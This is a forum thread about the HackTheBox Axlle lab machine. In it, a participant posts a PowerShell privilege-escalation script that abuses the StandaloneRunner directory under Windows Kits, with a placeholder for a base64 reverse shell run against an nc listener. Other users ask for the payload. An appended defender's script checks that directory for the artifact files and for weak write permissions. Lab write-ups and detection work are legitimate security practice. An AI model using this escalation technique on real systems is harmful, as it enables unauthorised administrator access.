HTB - Axlle
by Sqweez - Saturday June 22, 2024 at 06:57 PM
(Oct 01, 2024, 10:43 AM)Mas_PangaREP Wrote:
(Jul 09, 2024, 06:55 AM)Osminogka Wrote:
(Jul 09, 2024, 05:52 AM)maggi Wrote: I went to see if my janky ass way of getting on the box worked....works fine lobbing msf grenades still

BUT I believe they patched the root so overwriting of the standalonerunner is no longer a thing.

Yes, here is an exploit that you can use to get an administrator shell:
$rebootContent = @"
myTestDir
True
"@
$rebootContent | Set-Content -Path ".\reboot.rsf"

New-Item -Path ".\myTestDir\working" -ItemType Directory -Force

New-Item -Path ".\rsf.rsf" -ItemType File -Force
Copy-Item -Path ".\rsf.rsf" -Destination ".\myTestDir\working"

$commandContent = @"
Powershell base64 reverse shell
"@
$commandContent | Set-Content -Path ".\command.txt"

Start an nc listener and run this exploit in the standalonerunner directory; you have to wait around one minute.

Can you tell me the specific method for this, using a file or just copy-pasting those commands? I'm stuck.

You just need to save all the content that I posted inside a .ps1 file, exploit.ps1 for example. Also, before uploading this file you need to specify the correct payload for the remote shell, and then upload this script to the C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\ directory, then run it.
(Oct 12, 2024, 05:13 PM)Osminogka Wrote:
You just need to save all the content that I posted inside a .ps1 file, exploit.ps1 for example. Also, before uploading this file you need to specify the correct payload for the remote shell, and then upload this script to the C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\ directory, then run it.


It's not working. Can you provide more details and also the payload you used? Please.
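
A defender's check for the technique discussed in this thread, added here as an example and not posted by any participant: it looks in the directory named above for the file names the posted script creates and lists write-capable ACL entries held by principals outside a short trusted list. The function names and the trusted-SID list are assumptions; a hit is a lead to review, not proof of abuse.

```powershell
# Added example (not from the thread). Directory and file names are the ones
# quoted in the posts above; everything else is an assumption for illustration.
$dir       = 'C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64'
$artifacts = 'reboot.rsf', 'command.txt', 'rsf.rsf'

# Assumed trusted writers: SYSTEM, Administrators, CREATOR OWNER, TrustedInstaller
$trustedSids = 'S-1-5-18', 'S-1-5-32-544', 'S-1-3-0',
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'

function Get-RunnerArtifact {
    # Hypothetical helper: find the named files anywhere under $Path
    # (the posted script also drops one under a nested "working" folder).
    param([string]$Path, [string[]]$Names)
    Get-ChildItem -LiteralPath $Path -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $Names -contains $_.Name } |
        Select-Object FullName, Length, CreationTimeUtc, LastWriteTimeUtc,
            @{ n = 'Owner'; e = { (Get-Acl -LiteralPath $_.FullName).Owner } }
}

function Get-WeakWriteAce {
    # Hypothetical helper: Allow ACEs that let an untrusted SID create or
    # append files. Mask = WriteData | AppendData | GENERIC_WRITE | GENERIC_ALL,
    # so Modify and FullControl entries match as well.
    param([string]$Path, [string[]]$Trusted)
    $mask  = 0x50000006
    $acl   = Get-Acl -LiteralPath $Path
    $rules = $acl.GetAccessRules($true, $true,
        [System.Security.Principal.SecurityIdentifier])
    foreach ($r in $rules) {
        $canWrite = ([int]$r.FileSystemRights -band $mask) -ne 0
        if ($r.AccessControlType -eq 'Allow' -and $canWrite -and
            $Trusted -notcontains $r.IdentityReference.Value) {
            [pscustomobject]@{
                Sid       = $r.IdentityReference.Value
                Rights    = $r.FileSystemRights
                Inherited = $r.IsInherited
            }
        }
    }
}

if (Test-Path -LiteralPath $dir) {
    Get-RunnerArtifact -Path $dir -Names $artifacts | Format-Table -AutoSize
    Get-WeakWriteAce -Path $dir -Trusted $trustedSids | Format-Table -AutoSize
} else {
    Write-Output "Not present: $dir"
}
```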